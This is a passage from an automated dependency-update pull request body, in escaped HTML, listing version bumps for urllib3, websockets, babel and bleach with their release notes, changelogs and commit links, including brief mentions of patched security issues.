(2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.25.9...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `websockets` from 8.1 to 9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-websockets/websockets/releases\"\u003ewebsockets's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e9.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-websockets/websockets/blob/9.1/docs/changelog.rst\"\u003ewebsockets's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e9.1\n...\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 27, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e.. note::\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e**Version 9.1 fixes a security issue introduced in version 8.0.**\n\u003cp\u003eVersion 8.0 was vulnerable to timing attacks on HTTP Basic Auth passwords.\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003e9.0.2\n.....\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 15, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRestored compatibility of \u003ccode\u003epython -m websockets\u003c/code\u003e with Python \u0026lt; 3.9.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRestored compatibility with mypy.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e9.0.1\n.....\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 2, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed issues with the packaging of the 9.0 release.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e9.0\n...\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 1, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e.. note::\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e**Version 9.0 moves or deprecates several APIs.**\n\u003cp\u003eAliases provide backwards compatibility for all previously public APIs.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003e~datastructures.Headers\u003c/code\u003e and\u003cbr /\u003e\n:exc:\u003ccode\u003e~datastructures.MultipleValuesError\u003c/code\u003e were moved from\u003cbr /\u003e\n\u003ccode\u003ewebsockets.http\u003c/code\u003e to :mod:\u003ccode\u003ewebsockets.datastructures\u003c/code\u003e. If you're using\u003cbr /\u003e\nthem, you should adjust the import path.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe \u003ccode\u003eclient\u003c/code\u003e, \u003ccode\u003eserver\u003c/code\u003e, \u003ccode\u003eprotocol\u003c/code\u003e, and \u003ccode\u003eauth\u003c/code\u003e modules were\u003cbr /\u003e\nmoved from the \u003ccode\u003ewebsockets\u003c/code\u003e package to \u003ccode\u003ewebsockets.legacy\u003c/code\u003e\u003cbr /\u003e\nsub-package, as part of an upcoming refactoring. Despite the name,\u003cbr /\u003e\nthey're still fully supported. The refactoring should be a transparent\u003cbr /\u003e\nupgrade for most uses when it's available. The legacy implementation\u003cbr /\u003e\nwill be preserved according to the \u003ccode\u003ebackwards-compatibility policy\u003c/code\u003e_.\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/d0f328888f3e695aa64d78dcf48af4ece219221b\"\u003e\u003ccode\u003ed0f3288\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/547a26b685d08cac0aa64e5e65f7867ac0ea9bc0\"\u003e\u003ccode\u003e547a26b\u003c/code\u003e\u003c/a\u003e Use constant-time comparison for passwords.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/a14226afb77b524c2ced7d649ac7420a14992716\"\u003e\u003ccode\u003ea14226a\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/8900c13d3234c8ae87b0d852e849eaf6bf7cf8b7\"\u003e\u003ccode\u003e8900c13\u003c/code\u003e\u003c/a\u003e Add mypy to dictionary.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/0713dbf2d37a8c2c071d8479a6768dd3d3c7dacf\"\u003e\u003ccode\u003e0713dbf\u003c/code\u003e\u003c/a\u003e Add test coverage.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/b99c4fe390a22cc846ce550a29f2c9841e99660d\"\u003e\u003ccode\u003eb99c4fe\u003c/code\u003e\u003c/a\u003e Restore real imports for compatibility with mypy.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/e44e085e030d186c7bb9822becfbb5423aefe971\"\u003e\u003ccode\u003ee44e085\u003c/code\u003e\u003c/a\u003e Use relative imports everywhere, for consistency.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/70fadbf97c5a117ca13f6c8f4f111ba5025f3c94\"\u003e\u003ccode\u003e70fadbf\u003c/code\u003e\u003c/a\u003e Restore compatibility with Python \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/217ac2d19174c6f01d9524648eb4058985f72754\"\u003e\u003ccode\u003e217ac2d\u003c/code\u003e\u003c/a\u003e Fix broken link.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/fc176f462b6a5ef4f470df415780b09fed5da7c1\"\u003e\u003ccode\u003efc176f4\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-websockets/websockets/compare/8.1...9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.8.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.8.0...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 3.1.5 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca 